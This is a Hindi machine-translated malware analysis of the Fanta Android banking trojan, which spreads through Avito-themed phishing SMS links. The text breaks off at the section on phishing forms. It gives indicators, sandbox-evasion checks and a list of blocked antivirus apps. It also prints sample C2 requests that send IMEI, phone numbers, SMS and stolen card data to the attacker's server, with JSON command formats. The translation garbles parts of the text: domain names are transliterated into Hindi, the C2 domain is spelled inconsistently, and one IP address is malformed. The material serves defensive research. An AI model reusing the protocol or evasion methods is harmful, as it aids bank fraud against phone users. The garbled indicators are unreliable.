Leisya, Fanta: एक पुराने एंड्रॉइड ट्रोजन के लिए एक नई रणनीति

एक बार जब आप Avito पर कुछ बेचना चाहते हैं और, अपने उत्पाद का एक विस्तृत विवरण (उदाहरण के लिए, एक रैम मॉड्यूल) रखी है, तो आपको यह संदेश मिलेगा:

जब आप लिंक खोलते हैं, तो आपको खरीद के बजाय एक खुशहाल पृष्ठ दिखाई देगा, जो आपको, एक खुश और सफल विक्रेता को सूचित करेगा:


"जारी रखें" बटन पर क्लिक करने के बाद, आइकन और भरोसेमंद नाम वाली एक एपीके फ़ाइल आपके एंड्रॉइड डिवाइस पर डाउनलोड हो जाएगी। आपने एक एप्लिकेशन इंस्टॉल किया है जो किसी कारण से AccessibilityService अधिकारों के लिए अनुरोध करता है, फिर कुछ जोड़े विंडोज़ दिखाई दिए और जल्दी से गायब हो गए और ... यही है।

आप अपना बैलेंस जांचने के लिए आते हैं, लेकिन किसी कारण से आपका बैंकिंग एप्लिकेशन फिर से आपके कार्ड का विवरण मांगता है। डेटा दर्ज करने के बाद, एक भयानक बात होती है: किसी कारण से जो आपके लिए अभी तक स्पष्ट नहीं है, आपके खाते से पैसे गायब होने लगते हैं। आप समस्या को हल करने की कोशिश कर रहे हैं, लेकिन आपका फोन विरोध कर रहा है: यह "बैक" और "होम" कुंजी दबाता है, बंद नहीं करता है और सुरक्षा के किसी भी साधन को सक्रिय करने की अनुमति नहीं देता है। नतीजतन, आप पैसे के बिना छोड़ दिए जाते हैं, आपका सामान खरीदा नहीं गया है, आप भ्रमित हैं और सोच रहे हैं: क्या हुआ?

इसका उत्तर सरल है: आप एंड्रॉइड ट्रोजन फैंटा, फ्लेक्सनेट परिवार का शिकार हैं। ऐसा कैसे हुआ? हम अब समझाएंगे।

लेखक: एंड्री पोलोविंकिन , दुर्भावनापूर्ण कोड विश्लेषण में जूनियर विशेषज्ञ, इवान पिसेरेव , दुर्भावनापूर्ण कोड विश्लेषण विशेषज्ञ।

कुछ आँकड़े

पहली बार, फ्लेक्सनेट एंड्रॉइड ट्रोजन परिवार 2015 में वापस जाना गया। गतिविधि की एक लंबी लंबी अवधि में, परिवार का कई उप-प्रजातियों में विस्तार हुआ: फैंटा, लाइमबोट, लिप्टन, आदि। ट्रोजन, और साथ ही इसके साथ जुड़े बुनियादी ढांचे, अभी भी खड़ा नहीं है: नई प्रभावी वितरण योजनाएं विकसित की जा रही हैं - हमारे मामले में, एक विशिष्ट उपयोगकर्ता-विक्रेता के उद्देश्य से उच्च गुणवत्ता वाले फ़िशिंग पृष्ठ, और ट्रोजन के डेवलपर्स वायरस लेखन में फैशन के रुझान का पालन करते हैं: नई सुविधाएँ जोड़ें जो आपको अधिक प्रभावी ढंग से चोरी करने की अनुमति देती हैं। संक्रमित उपकरणों से पैसा और सुरक्षा तंत्र को बायपास करना।

इस लेख में वर्णित अभियान रूस के उपयोगकर्ताओं के उद्देश्य से है, यूक्रेन में संक्रमित उपकरणों की एक छोटी संख्या का पता चला था, और कजाकिस्तान और बेलारूस में भी कम।

इस तथ्य के बावजूद कि फ्लेक्सनेट 4 साल से अधिक समय तक एंड्रॉइड ट्रोजन के क्षेत्र में रहा है और कई शोधकर्ताओं द्वारा विस्तार से अध्ययन किया गया है, यह अभी भी अच्छे आकार में है। जनवरी 2019 से शुरू होने वाले नुकसान की संभावित मात्रा 35 मिलियन रूबल से अधिक है - और यह केवल रूस में अभियानों के लिए है। 2015 में, इस एंड्रॉइड ट्रोजन के विभिन्न संस्करण भूमिगत मंचों पर बेचे गए, जहां विस्तृत विवरण के साथ ट्रोजन का स्रोत कोड भी पाया जा सकता है। और इसका मतलब है कि दुनिया में क्षति के आंकड़े और भी प्रभावशाली हैं। ऐसे बूढ़े आदमी के लिए एक अच्छा संकेतक, है ना?

बेचने से लेकर धोखा देने तक

जैसा कि आप पहले पेश किए गए Avito विज्ञापनों को रखने के लिए इंटरनेट सेवा के लिए फ़िशिंग पृष्ठ के स्क्रीनशॉट से देख सकते हैं, यह एक विशिष्ट शिकार के लिए तैयार किया गया था। जाहिर है, हमलावर Avito पार्सर में से एक का उपयोग करते हैं, फोन नंबर और विक्रेता का नाम, साथ ही उत्पाद का विवरण निकालते हैं। पृष्ठ के विस्तार और एपीके-फ़ाइल तैयार होने के बाद, पीड़ित को उसके नाम और उसके उत्पाद के विवरण और उत्पाद की "बिक्री" से प्राप्त राशि वाले फ़िशिंग पृष्ठ के लिंक के साथ एक एसएमएस संदेश भेजा जाता है। बटन पर क्लिक करने से, उपयोगकर्ता को एक दुर्भावनापूर्ण APK-फ़ाइल प्राप्त होती है - Fanta।

Shcet491 [।] आरयू डोमेन की एक परीक्षा से पता चला कि यह Hostinger के DNS सर्वरों को सौंपा गया था:

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

डोमेन ज़ोन फ़ाइल में आईपी पते को इंगित करने वाली प्रविष्टियाँ होती हैं 31.220.23 [।] 236, 31.220.23 [।] 243 और 31.220.23 [।] 235। हालाँकि, डोमेन मास्टर संसाधन रिकॉर्ड (A रिकॉर्ड) एक सर्वर को 178.132.1 [।] 240 के IP पते के साथ इंगित करता है।

IP पता 178.132.1 [।] 240 नीदरलैंड में स्थित है और यह WorldStream हॉस्टल का है। IP पते 31.220.23 [।] 235, 31.220.23 [।] 236 और 31.2.2.23 [।] 243 यूनाइटेड किंगडम में स्थित हैं और साझा होस्टिंग सर्वर HOSTINGER से संबंधित हैं। Openprov-ru एक रजिस्ट्रार के रूप में उपयोग किया जाता है। निम्नलिखित डोमेन भी IP पते 178.132.1 [।] 240 पर हल हो गए:

• sdelka-ru [।] ​​आरयू
• तवर-अवि [।] आरयू
• एवी-तेवर [।] आरयू
• ru-sdelka [।] आरयू
• shcet382 [।] आरयू
• sdelka221 [।] आरयू
• sdelka211 [।] आरयू
• vyplata437 [।] आरयू
• viplata291 [।] आरयू
• perevod273 [।] आरयू
• perevod901 [।] आरयू

यह ध्यान दिया जाना चाहिए कि लगभग सभी डोमेन में निम्न प्रारूप के लिंक थे:

http: // (www।) {0,1} <% डोमेन%> / [0-9] {7}

एक एसएमएस संदेश से एक लिंक भी इस टेम्पलेट के अंतर्गत आता है। ऐतिहासिक आंकड़ों के अनुसार, यह पाया गया कि एक लिंक उपरोक्त टेम्पलेट के अनुसार कई लिंक से मेल खाती है, जो कई पीड़ितों को ट्रोजन वितरित करने के लिए एक डोमेन के उपयोग को इंगित करता है।

चलो थोड़ा आगे चलते हैं: एक नियंत्रण सर्वर के रूप में, एसएमएस से एक लिंक के माध्यम से डाउनलोड की गई ट्रोजन ऑनसाड्सडैप []] पते का उपयोग करता है। यह डोमेन 2019-03-12 को पंजीकृत किया गया था, और 2019-04-29 से शुरू होकर, एपीके-अनुप्रयोगों ने इस डोमेन के साथ बातचीत की। VirusTotal से प्राप्त आंकड़ों के आधार पर, इस सर्वर के साथ कुल 109 अनुप्रयोगों ने बातचीत की। डोमेन ने स्वयं ही IP पते 217.23.14 [] 27 को हल किया, जो नीदरलैंड में स्थित है और वर्ल्डस्ट्रीम होस्टर के स्वामित्व में है। नेमस्पेस को रजिस्ट्रार के रूप में उपयोग किया जाता है। डोमेन बैड- आरसून [।] क्लब (2018-09-25 से शुरू) और बैड- रकून []। लाइव (2018-10-25 से शुरू) भी इस आईपी पते पर हल हो गया। 80 से अधिक एपीके फाइलों ने खराब-रकून के साथ बातचीत की []। क्लब डोमेन, 100 से अधिक ने खराब-रकून के साथ बातचीत की । [] लाइव डोमेन।

सामान्य तौर पर, हमले की प्रगति इस प्रकार है:

फन्ता हुड के नीचे क्या है?

कई अन्य एंड्रॉइड ट्रोजन की तरह, फैंटा एसएमएस संदेश पढ़ने और भेजने में सक्षम है, यूएसएसडी अनुरोध करते हैं, अनुप्रयोगों के शीर्ष पर अपनी स्वयं की खिड़कियां दिखाते हैं (बैंकिंग वाले सहित)। हालांकि, इस परिवार की कार्यक्षमता का शस्त्रागार आ गया: फैंटा ने विभिन्न उद्देश्यों के लिए एक्सेसिबिलिटी सेवा का उपयोग करना शुरू किया: अन्य अनुप्रयोगों से सूचनाओं की सामग्री को पढ़ना, एक संक्रमित डिवाइस पर ट्रोजन के निष्पादन का पता लगाना और रोकना, आदि। Fanta एंड्रॉइड के सभी संस्करणों पर काम करता है जो 4.4 से कम नहीं है। इस लेख में, हम निम्नलिखित फैंटा नमूने पर एक करीब से नज़र डालेंगे:

• MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

लॉन्च के तुरंत बाद

लॉन्च के तुरंत बाद ट्रोजन अपने आइकन को छुपाता है। एप्लिकेशन ऑपरेशन तभी संभव है जब संक्रमित डिवाइस का नाम सूची में नहीं है:

• android_x86
• VirtualBox
• Nexus 5X (बुलहेड)
• Nexus 5 (रेज़र)

यह चेक ट्रोजन की मुख्य सेवा में किया जाता है - मेन सर्विस । पहली शुरुआत में, एप्लिकेशन के कॉन्फ़िगरेशन पैरामीटर को डिफ़ॉल्ट मानों (कॉन्फ़िगरेशन डेटा के संग्रहण प्रारूप और उनके मूल्य पर बाद में चर्चा की जाएगी) के साथ प्रारंभ किया जाता है, साथ ही प्रबंधन सर्वर पर एक नए संक्रमित डिवाइस के पंजीकरण के साथ। HTTP POST अनुरोध सर्वर को register_bot संदेश प्रकार और संक्रमित डिवाइस (Android संस्करण, IMEI, फोन नंबर, ऑपरेटर नाम और देश कोड जिसमें ऑपरेटर पंजीकृत है) के बारे में जानकारी के साथ भेजा जाएगा। सर्वर का पता hXXp: // onuseseddohap [।] क्लब / कंट्रोलर है । जवाब में, सर्वर एक संदेश भेजता है जिसमें फ़ील्ड bot_id , bot_pwd , सर्वर होता है - एप्लिकेशन इन मानों को CnC सर्वर के मापदंडों के रूप में सहेजता है। यदि फ़ील्ड प्राप्त नहीं हुआ था, तो सर्वर पैरामीटर वैकल्पिक है : फ़ैंटा पंजीकरण पते का उपयोग करता है - hXXp: // onusesedhahap [।] क्लब / कंट्रोलर । एफपी । CnC पते को बदलने के कार्य का उपयोग दो समस्याओं को हल करने के लिए किया जा सकता है: समान रूप से कई सर्वरों के बीच लोड को वितरित करें (बड़ी संख्या में संक्रमित उपकरणों के साथ, अनपॉन्टिमाइज्ड वेब सर्वर पर लोड अधिक हो सकता है), और CnC सर्वरों में से एक की विफलता के मामले में एक वैकल्पिक सर्वर का उपयोग करने के लिए भी ।

यदि अनुरोध भेजते समय कोई त्रुटि हुई, तो ट्रोजन 20 सेकंड के बाद पंजीकरण प्रक्रिया को दोहराएगा।

डिवाइस को सफलतापूर्वक पंजीकृत करने के बाद, फैंटा उपयोगकर्ता को निम्न संदेश प्रदर्शित करेगा:


महत्वपूर्ण सूचना: सिस्टम सिक्योरिटी नामक एक सेवा ट्रोजन सेवा का नाम है, और ओके बटन पर क्लिक करने के बाद संक्रमित डिवाइस की एक्सेसिबिलिटी सेटिंग्स के साथ एक विंडो खुलती है, जहां उपयोगकर्ता को दुर्भावनापूर्ण सेवा के लिए एक्सेसिबिलिटी अधिकार जारी करना होगा:


जैसे ही उपयोगकर्ता AccessibilityService को चालू करता है, Fanta एप्लिकेशन विंडो की सामग्री और उन में किए गए कार्यों तक पहुंच प्राप्त करता है:


अभिगम्यता अधिकार प्राप्त करने के तुरंत बाद, ट्रोजन व्यवस्थापक अधिकारों और सूचनाओं को पढ़ने का अधिकार मांगता है:


AccessibilityService का उपयोग करते हुए, एप्लिकेशन कीस्ट्रोक्स का अनुकरण करता है, जिससे खुद को सभी आवश्यक अधिकार मिलते हैं।

फैंटा कई डेटाबेस इंस्टेंसेस (जो बाद में वर्णित किया जाएगा) बनाता है जो कॉन्फ़िगरेशन डेटा को बचाने के लिए आवश्यक हैं, साथ ही प्रक्रिया के दौरान एकत्र किए गए संक्रमित डिवाइस के बारे में जानकारी। एकत्रित जानकारी भेजने के लिए, ट्रोजन डेटाबेस से फ़ील्ड्स को अनलोड करने के लिए डिज़ाइन किया गया एक दोहराता कार्य बनाता है और नियंत्रण सर्वर से एक कमांड प्राप्त करता है। CnC तक पहुंचने का अंतराल एंड्रॉइड के संस्करण के आधार पर निर्धारित किया गया है: 5.1 के मामले में, अंतराल 10 सेकंड होगा, अन्यथा 60 सेकंड।

एक कमांड प्राप्त करने के लिए, फैंटा प्रबंधन सर्वर के लिए गेटटैक अनुरोध करता है। जवाब में, CnC निम्नलिखित में से एक आदेश भेज सकता है:
फैंटा 70 बैंकिंग एप्लिकेशन, त्वरित भुगतान प्रणाली और ई-वॉलेट से सूचनाएं एकत्र करता है और उन्हें डेटाबेस में संग्रहीत करता है।

कॉन्फ़िगरेशन सेटिंग्स संग्रहण

कॉन्फ़िगरेशन मापदंडों को संग्रहीत करने के लिए, Fanta एंड्रॉइड प्लेटफॉर्म के लिए मानक दृष्टिकोण का उपयोग करता है - प्राथमिकताएं फाइलें। सेटिंग्स नामक फाइल में सेव हो जाएगी। सहेजे गए मापदंडों का विवरण नीचे दी गई तालिका में है।
Fanta भी smsManager फ़ाइल का उपयोग करती है:

डेटाबेस इंटरेक्शन

अपने काम की प्रक्रिया में ट्रोजन दो डेटाबेस का उपयोग करता है। फोन नामक डेटाबेस का उपयोग फोन से एकत्र की गई विभिन्न सूचनाओं को संग्रहीत करने के लिए किया जाता है। दूसरे डेटाबेस को fanta.db कहा जाता है और इसका उपयोग बैंक कार्ड के बारे में जानकारी एकत्र करने के लिए डिज़ाइन की गई फ़िशिंग विंडो बनाने के लिए जिम्मेदार सेटिंग्स को बचाने के लिए किया जाता है।

ट्रोजन अपने द्वारा एकत्र की गई जानकारी को संग्रहीत करने और अपने कार्यों को लॉग करने के लिए एक डेटाबेस का उपयोग करता है। डेटा लॉग तालिका में संग्रहीत किया जाता है। तालिका बनाने के लिए, निम्न SQL क्वेरी का उपयोग करें:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer) 

डेटाबेस में निम्नलिखित जानकारी है:

1. एक संक्रमित डिवाइस को संदेश के साथ शामिल करने पर लॉग ऑन करना फ़ोन चालू!

2. अनुप्रयोगों से अधिसूचना। संदेश निम्न टेम्पलेट के अनुसार बनता है:

 (<%App Name%>)<%Title%>: <%Notification text%> 

3. ट्रोजन फ़िशिंग रूपों से बैंक कार्ड डेटा। VIEW_NAME पैरामीटर सूची में से एक हो सकता है:

• AliExpress
• Avito
• गूगल प्ले
• विविध <% ऐप नाम%>

संदेश प्रारूप में लॉग इन किया गया है:

 [<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>)  :<%CARD_NUMBER%>; :<%MONTH%>/<%YEAR%>; CVV: <%CVV%> 

4. इनकमिंग / आउटगोइंग एसएमएस संदेश प्रारूप में:

 ([<%Time in format HH:mm:ss dd.MM.yyyy%>] : /) <%Mobile number%>:<%SMS-text%> 

5. प्रारूप में संवाद बॉक्स बनाने वाले पैकेज के बारे में जानकारी:

 (<%Package name%>)<%Package information%> 

उदाहरण लॉग तालिका:


फांटा की विशेषताओं में से एक बैंक कार्ड जानकारी का संग्रह है। बैंकिंग एप्लिकेशन खोलते समय फ़िशिंग विंडो के निर्माण के कारण डेटा संग्रह होता है। ट्रोजन एक फ़िशिंग विंडो केवल एक बार बनाता है। यह जानकारी कि विंडो को उपयोगकर्ता को दिखाया गया था, फंतासी . db डेटाबेस में सेटिंग्स तालिका में संग्रहीत है। डेटाबेस बनाने के लिए निम्न SQL क्वेरी का उपयोग किया जाता है:

 create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer); 

सेटिंग्स तालिका के सभी क्षेत्रों को 1 से डिफ़ॉल्ट रूप से प्रारंभ किया जाता है (एक फ़िशिंग विंडो बनाएं)। उपयोगकर्ता द्वारा अपना डेटा दर्ज किए जाने के बाद, मान 0. सेट टेबल के उदाहरण क्षेत्रों में सेट किया जाएगा:

• can_login - बैंकिंग एप्लिकेशन खोलते समय फॉर्म दिखाने के लिए फ़ील्ड जिम्मेदार है
• first_bank - उपयोग नहीं किया गया
• can_avito - एविटो एप्लिकेशन को खोलते समय फ़ॉर्म दिखाने के लिए फ़ील्ड जिम्मेदार है
• can_ali - फ़ील्ड Aliexpress एप्लिकेशन को खोलते समय फ़ॉर्म दिखाने के लिए ज़िम्मेदार है
• can_another - सूची से किसी भी एप्लिकेशन को खोलते समय फ़ॉर्म दिखाने के लिए फ़ील्ड जिम्मेदार है: Yula, Pandao, Drome Auto, Wallet। डिस्काउंट और बोनस कार्ड, Aviasales, बुकिंग, Trivago
• can_card - Google Play खोलते समय फ़ॉर्म दिखाने के लिए फ़ील्ड जिम्मेदार है

प्रबंधन सर्वर इंटरेक्शन

प्रबंधन सर्वर के साथ नेटवर्क संचार HTTP के माध्यम से होता है। Fanta नेटवर्क के साथ काम करने के लिए लोकप्रिय रेट्रोफिट लाइब्रेरी का उपयोग करता है। अनुरोध hXXp: // onuseseddohap [।] क्लब / नियंत्रक . php को भेजे जाते हैं। सर्वर पर पंजीकरण के दौरान सर्वर का पता बदला जा सकता है। एक कुकी सर्वर से आ सकती है। Fanta निम्नलिखित सर्वर अनुरोधों को निष्पादित करता है:

• बॉट पहली शुरुआत में एक बार प्रबंधन सर्वर पर पंजीकृत होता है। संक्रमित डिवाइस के बारे में निम्न डेटा सर्वर को भेजा जाता है:
  · कुकीज़ - सर्वर से प्राप्त कुकीज़ (डिफ़ॉल्ट मान एक रिक्त स्ट्रिंग है)
  · मोड - स्ट्रिंग निरंतर रजिस्टर_बॉट
  उपसर्ग - पूर्णांक स्थिर 2
  · Version_sdk - निम्न पैटर्न द्वारा उत्पन्न: <% Build.MODEL%> / <% Build.VERSION.RELEASE%> (Avit)
  इमी - संक्रमित डिवाइस का आईएमईआई
  · देश - उस देश का कोड जिसमें ऑपरेटर पंजीकृत है, आईएसओ प्रारूप में
  · नंबर - फोन नंबर
  · ऑपरेटर - ऑपरेटर का नाम
  
  सर्वर को भेजे गए अनुरोध का एक उदाहरण:
  
  

   POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%> 

  
  अनुरोध के जवाब में, सर्वर को एक JSON ऑब्जेक्ट वापस करना चाहिए जिसमें निम्नलिखित पैरामीटर हैं:
  · बोट_िड - संक्रमित डिवाइस की पहचानकर्ता। यदि bot_id 0 है, तो Fanta अनुरोध को फिर से निष्पादित करेगा।
  · Bot_pwd - सर्वर के लिए पासवर्ड।
  · सर्वर - प्रबंधन सर्वर का पता। वैकल्पिक पैरामीटर। यदि पैरामीटर निर्दिष्ट नहीं है, तो आवेदन में संग्रहीत पते का उपयोग किया जाएगा।
  
  उदाहरण JSON ऑब्जेक्ट:
  
  

   { "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" } 

• सर्वर से एक कमांड प्राप्त करने का अनुरोध करें। निम्न डेटा सर्वर पर भेजा जाता है:
  · कुकीज़ - सर्वर से कुकीज़ प्राप्त की
  · उस संक्रमित उपकरण की बोली - आईडी जो रजिस्टर_बॉट के अनुरोध को भेजते समय प्राप्त की गई थी
  · Pwd - सर्वर के लिए पासवर्ड
  · Divice_admin - क्षेत्र निर्धारित करता है कि क्या प्रशासक अधिकार प्राप्त कर चुके हैं। यदि व्यवस्थापक अधिकार प्राप्त किए गए थे, तो फ़ील्ड 1 है , अन्यथा 0
  · अभिगम्यता - अभिगम्यता सेवा की स्थिति। यदि सेवा शुरू की गई थी, तो मान 1 है , अन्यथा 0
  · SMSManager - दिखाता है कि ट्रोजन एसएमएस प्राप्त करने के लिए डिफ़ॉल्ट एप्लिकेशन के रूप में चालू है या नहीं
  · स्क्रीन - स्क्रीन की स्थिति को प्रदर्शित करता है। यह 1 पर सेट होगा यदि स्क्रीन चालू है, अन्यथा 0 ;
  
  सर्वर को भेजे गए अनुरोध का एक उदाहरण:
  
  

   POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%> 

  
  आदेश के आधार पर, सर्वर विभिन्न मापदंडों के साथ एक JSON ऑब्जेक्ट लौटा सकता है:
  
  · आदेश भेजें एसएमएस संदेश : मापदंडों में फोन नंबर, एसएमएस संदेश का पाठ और भेजे जाने वाले संदेश की पहचानकर्ता शामिल हैं। पहचानकर्ता का उपयोग तब सेटस्मास्टैटस प्रकार के साथ सर्वर पर संदेश भेजते समय किया जाता है।
  
  

   { "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" } 

  
  · फ़ोन कॉल करें या USSD कमांड करें : फोन नंबर या कमांड रिस्पॉन्स बॉडी में आता है।
  
  

   { "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" } 

  
  · आदेश अंतराल पैरामीटर बदलें ।
  
  

   { "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" } 

  
  · कमांड चेंज इंटरसेप्ट पैरामीटर ।
  
  

   { "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" } 

  
  · SmsManager फ़ील्ड कमांड बदलें ।
  
  

   { "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" } 

  
  · एक संक्रमित डिवाइस से एसएमएस संदेश इकट्ठा करें ।
  
  

   { "response": [ { "mode": 9 } ], "status":"ok" } 

  
  · फ़ैक्टरी सेटिंग कमांड पर फ़ोन रीसेट करें :
  
  

   { "response": [ { "mode": 11 } ], "status":"ok" } 

  
  · कमांड बदलें ReadDialog पैरामीटर ।
  
  

   { "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" } 

• एक संदेश को टाइप सेटसमस्टैटस के साथ भेजना । यह अनुरोध कमांड सेंड एसएमएस के बाद किया जाता है। अनुरोध इस प्रकार है:

 POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%> 

• डेटाबेस सामग्री जमा करना। अनुरोध के लिए, एक पंक्ति प्रेषित की जाती है। निम्न डेटा सर्वर पर भेजा जाता है:
  · कुकीज़ - सर्वर से कुकीज़ प्राप्त की
  · मोड - स्ट्रिंग निरंतर सेटवेसबॉक्स
  · उस संक्रमित उपकरण की बोली - आईडी जो रजिस्टर_बॉट के अनुरोध को भेजते समय प्राप्त की गई थी
  · पाठ - वर्तमान डेटाबेस रिकॉर्ड में पाठ (डेटाबेस में लॉग तालिका से क्षेत्र घ )
  · संख्या - वर्तमान डेटाबेस रिकॉर्ड का नाम (डेटाबेस में तालिका लॉग से फ़ील्ड p )
  Sms_mode - पूर्णांक मान (डेटाबेस में तालिका लॉग से फ़ील्ड m )
  
  अनुरोध इस प्रकार है:
  
  

   POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%> 

  
  सर्वर पर भेजने में सफल होने पर, पंक्ति तालिका से हटा दी जाएगी। JSON ऑब्जेक्ट का एक उदाहरण सर्वर द्वारा लौटाया गया:
  
  

   { "response":[], "status":"ok" } 

AccessibilityService के साथ सहभागिता

विकलांग लोगों द्वारा Android उपकरणों के उपयोग को सुविधाजनक बनाने के लिए AccessibilityService लागू किया गया था। ज्यादातर मामलों में, आवेदन के साथ बातचीत करने के लिए शारीरिक बातचीत की आवश्यकता होती है। AccessibilityService आपको उन्हें प्रोग्रामेटिक रूप से बनाने की अनुमति देता है। फैंटा सेवा का उपयोग बैंकिंग अनुप्रयोगों में नकली खिड़कियां बनाने और सिस्टम सेटिंग्स और कुछ अनुप्रयोगों के उद्घाटन को रोकने के लिए करता है।

AccessibilityService की कार्यक्षमता का उपयोग करते हुए, ट्रोजन एक संक्रमित डिवाइस की स्क्रीन पर तत्वों में परिवर्तन की निगरानी करता है। जैसा कि पहले बताया गया है, फैंटा सेटिंग्स में डायलॉग बॉक्स के साथ लॉगिंग ऑपरेशंस के लिए जिम्मेदार एक पैरामीटर है - readDialog । यदि यह पैरामीटर सेट किया गया है, तो पैकेज का नाम और विवरण के बारे में जानकारी जो घटना को चालू करता है, डेटाबेस में जोड़ा जाएगा। ट्रोजन निम्न गतिविधियाँ करता है जब घटनाओं को ट्रिगर किया जाता है:

• के मामले में कीस्ट्रोक्स को पीछे और घर में जमा करता है:
  · यदि उपयोगकर्ता अपने डिवाइस को रिबूट करना चाहता है
  · यदि उपयोगकर्ता "Avito" एप्लिकेशन को हटाना चाहता है या एक्सेस अधिकारों को बदलना चाहता है
  · यदि पृष्ठ "Avito" अनुप्रयोग का उल्लेख करता है
  जब आप एप्लिकेशन "Google Play सुरक्षा" खोलते हैं
  · AccessibilityService सेटिंग्स वाले पेज खोलने पर
  जब "सिस्टम सुरक्षा" संवाद बॉक्स प्रकट होता है
  · सेटिंग के साथ पेज खोलने पर "अन्य ऐप पर ड्रा करें"
  जब आप पृष्ठ "एप्लिकेशन", "पुनर्स्थापित और रीसेट", "डेटा रीसेट करें", "रीसेट सेटिंग्स", "डेवलपर पैनल", "विशेष" खोलते हैं। अवसर "," पहुंच "," विशेष अधिकार "
  · यदि घटना कुछ अनुप्रयोगों द्वारा उत्पन्न की गई थी।
  
  
  आवेदन सूची

  • एंड्रॉयड
  • मास्टर लाइट
  • स्वच्छ गुरु
  • X86 CPU के लिए क्लीन मास्टर
  • Meizu Applicationatiom अनुमति प्रबंधन
  • MIUI सुरक्षा
  • क्लीन मास्टर - एंटीवायरस और क्लीनअप कैश और जंक
  • माता-पिता के नियंत्रण और जीपीएस: Kaspersky SafeKids
  • Kaspersky एंटीवायरस AppLock और वेब सुरक्षा बीटा
  • वायरस क्लीनर, एंटीवायरस, क्लीनर (MAX सुरक्षा)
  • मोबाइल एंटीवायरस वायरस प्रो
  • अवास्ट एंटीवायरस और मुफ्त सुरक्षा 2019
  • मोबाइल सुरक्षा मेगाफोन
  • एवीजी सुरक्षा एक्सपीरिया के लिए
  • मोबाइल सुरक्षा
  • मैलवेयर और एंटीवायरस और सुरक्षा
  • एंड्रॉइड 2019 पर एंटीवायरस
  • सुरक्षा मास्टर - एंटीवायरस, वीपीएन, AppLock, बूस्टर
  • हुआवेई सिस्टम मैनेजर टैबलेट के लिए एवीजी एंटीवायरस
  • सैमसंग की पहुंच
  • सैमसंग स्मार्ट मैनेजर
  • सुरक्षा गुरु
  • गति बढ़ाने वाला
  • Dr.Web
  • Dr.Web सुरक्षा स्थान
  • Dr.Web मोबाइल नियंत्रण केंद्र
  • Dr.Web सुरक्षा अंतरिक्ष जीवन
  • Dr.Web मोबाइल नियंत्रण केंद्र
  • एंटीवायरस और मोबाइल सुरक्षा
  • Kaspersky इंटरनेट सुरक्षा: एंटी-वायरस और सुरक्षा
  • कास्परस्की बैटरी लाइफ: सेवर और बूस्टर
  • Kaspersky समापन बिंदु सुरक्षा - सुरक्षा और प्रबंधन
  • एवीजी एंटीवायरस मुफ्त 2019 - एंड्रॉइड के लिए सुरक्षा
  • एंटीवायरस Android
  • नॉर्टन मोबाइल सिक्योरिटी एंड एंटीवायरस
  • एंटीवायरस, फ़ायरवॉल, वीपीएन, मोबाइल सुरक्षा
  • मोबाइल सुरक्षा: एंटीवायरस, वीपीएन, एंटी-थेफ्ट
  • Android के लिए एंटीवायरस

  
  
• यदि एसएमएस संदेश को कम संख्या में भेजने की अनुमति दी जाती है, तो फैंटा चेकबॉक्स याद रखें चयन और बटन भेजें पर क्लिक करता है।
• जब आप ट्रोजन से व्यवस्थापक अधिकारों को हटाने की कोशिश करते हैं, तो यह फोन स्क्रीन को लॉक कर देता है।
• नए व्यवस्थापकों को जोड़ने से रोकता है।
• यदि एंटी-वायरस एप्लिकेशन dr.web एक खतरे का पता लगाता है, तो Fanta इग्नोर बटन पर एक क्लिक का अनुकरण करता है।
• सैमसंग डिवाइस केयर एप्लिकेशन द्वारा एक घटना उत्पन्न होने पर एक ट्रोजन एक बटन वापस और घर पर क्लिक करने की नकल करता है।
• यदि बैंक एप्लिकेशन के बारे में 30 विभिन्न इंटरनेट सेवाओं को शामिल करने वाली सूची से लॉन्च किया गया था, तो फैंटा फ़िशिंग विंडो बनाता है। इनमें: AliExpress, Booking, Avito, Google Play Market घटक, पांडो, क्रोम ऑटो, आदि।
  
  

  फ़िशिंग फ़ॉर्म

  
  Fanta विश्लेषण करता है कि कौन से एप्लिकेशन संक्रमित डिवाइस पर चलते हैं। यदि ब्याज का एक आवेदन खोला गया था, ट्रोजन अन्य सभी के शीर्ष पर एक फ़िशिंग विंडो दिखाता है, जो बैंक कार्ड के बारे में जानकारी दर्ज करने का एक रूप है। उपयोगकर्ता को निम्न डेटा दर्ज करना होगा:
  
